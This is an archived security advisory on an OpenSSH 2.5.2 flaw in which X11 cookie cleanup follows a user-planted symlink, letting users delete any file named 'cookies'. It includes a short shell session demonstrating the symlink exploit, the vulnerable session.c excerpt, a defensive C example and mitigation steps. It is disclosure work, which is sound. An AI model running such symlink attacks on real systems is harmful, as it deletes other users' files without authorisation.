COMMAND

    OpenSSH

SYSTEMS AFFECTED

    OpenSSH

PROBLEM

    'zen-parse' found the following.  You can delete any file on the
    filesystem you want... as long as it's called cookies.  Not really
    a very useful bug, but it could cause annoyances to people  who
    actually like their cookies.

    Sample exploit:

        [root@clarity /root]# touch /cookies;ls /cookies
        /cookies
        [root@clarity /root]# ssh zen@localhost
        zen@localhost's password:
        Last login: Mon Jun  4 20:22:39 2001 from localhost.local
        Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
        [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
        [zen@clarity zen]$ logout
        Connection to localhost closed.
        [root@clarity /root]# ls /cookies
        /bin/ls: /cookies: No such file or directory

    Tested on Red Hat Linux release 7.0 (Guinness):

        [zen-parse@clarity zen-parse]$ rpm -qf /usr/sbin/sshd
        openssh-server-2.5.2p2-1.7.2
        [zen-parse@clarity zen-parse]$ ssh -V
        OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL 0x0090581f

    The configuration file has not been modified from  the  default
    settings.  Although sshd does drop root privileges, the process's
    supplementary groups are not cleared.  This  was  observed  from
    /proc/$$/status of the sshd handling the session  and  from  the
    output of strace and ltrace: there is no  initgroups  call  in  the
    ltrace output of the process that creates the directory,  although
    it does change its euid beforehand, and there is no setgroups call
    in the strace output.

    The file itself is  created with O_EXCL so  a symlink in place  of
    the file cannot be used to create/overwrite arbitrary files.

    This vulnerability works  fine on both  RedHat 7.1 &  7.0 with the
    latest updated packages from RedHat installed.

    Jerry Connolly tested it on OpenSSH_2.5.2  on  OpenBSD  and  it
    worked.  He had to enable X forwarding on the client and  server
    before the remote machine would create (and attempt to unlink())
    the cookies file.  The offending code is in session.c,  in  the
    xauthfile_cleanup_proc() function:

        <SNIP>
        /*
         * Remove local Xauthority file.
         */
        void
        xauthfile_cleanup_proc(void *ignore)
        {
            debug("xauthfile_cleanup_proc called");

            if (xauthfile != NULL) {
                char *p;
                unlink(xauthfile);
        </SNIP>

    where xauthfile  points to  a buffer  containing the  name of  the
    cookies file.
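    The cleanup above unlinks a path under a directory the user can
    replace with a symlink.  As an added example (not OpenSSH's code
    nor its actual fix), the following shows one defensive way to do
    the same cleanup: open the session directory with O_NOFOLLOW,
    check that it is a real directory owned by the expected uid, and
    unlink the cookie relative to that descriptor.  The function and
    scenario names, and the scratch paths under /tmp, are this
    example's own assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Remove dir/cookies only if dir is a real directory (not a symlink) owned
 * by expected_uid and not group/world writable. O_NOFOLLOW makes open() fail
 * on a symlinked session directory, so the link is refused, not followed.
 * Returns 0 on success, -1 on error or refusal. */
int safe_remove_cookie(const char *dir, uid_t expected_uid)
{
    struct stat st;
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0)
        return -1;
    if (fstat(dfd, &st) < 0 || !S_ISDIR(st.st_mode) ||
        st.st_uid != expected_uid || (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(dfd);
        return -1;
    }
    int rc = unlinkat(dfd, "cookies", 0); /* resolved relative to the checked fd */
    close(dfd);
    return rc;
}

/* Constructed scenario under a scratch directory: a real session dir and a
 * symlink standing in for one, as in the advisory. Returns 1 if the real
 * cookie was removed and the one behind the symlink survived, else 0. */
int demo_scenarios(void)
{
    char base[] = "/tmp/cookie-demo-XXXXXX", real[64], victim[64], lnk[64], p[80];
    if (mkdtemp(base) == NULL)
        return 0;
    snprintf(real, sizeof real, "%s/ssh-real", base);
    snprintf(victim, sizeof victim, "%s/victim", base);
    snprintf(lnk, sizeof lnk, "%s/ssh-link", base);
    mkdir(real, 0700); mkdir(victim, 0700);
    snprintf(p, sizeof p, "%s/cookies", real);
    close(open(p, O_WRONLY | O_CREAT | O_EXCL, 0600));
    snprintf(p, sizeof p, "%s/cookies", victim);
    close(open(p, O_WRONLY | O_CREAT | O_EXCL, 0600));
    symlink(victim, lnk);
    int removed = safe_remove_cookie(real, getuid()) == 0;
    int refused = safe_remove_cookie(lnk, getuid()) == -1;
    int survived = access(p, F_OK) == 0; /* p is still victim/cookies */
    unlink(p); unlink(lnk); rmdir(real); rmdir(victim); rmdir(base);
    return removed && refused && survived;
}
```

    Running demo_scenarios() shows the real cookie being removed while
    the one reached only through the symlink is left untouched.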

SOLUTION

    Fixed in openssh's cvs (see www.openssh.com).

    For NetBSD  if you  cannot upgrade  the sshd(8)  binary, make sure
    you have "X11Forwarding no" in your system-wide sshd configuration
    file.  The configuration file is located at /etc/sshd_config  (for
    pkgsrc)  or  /etc/sshd.conf  (in-tree  sshd).   If  you  are using
    openssh from pkgsrc, upgrade it to openssh-2.9p2 or higher.   Make
    sure you have  removed older sshd(8)  binaries.  If  you are using
    ssh from  pkgsrc (security/ssh,  ssh.com implementation),  migrate
    to  openssh  from  pkgsrc  (security/openssh).   If  you are using
    in-tree sshd  (/usr/sbin/sshd), you  may want  to install  openssh
    pkgsrc  (2.9p2  or  later)  and  use /usr/pkg/sbin/sshd instead of
    /usr/sbin/sshd.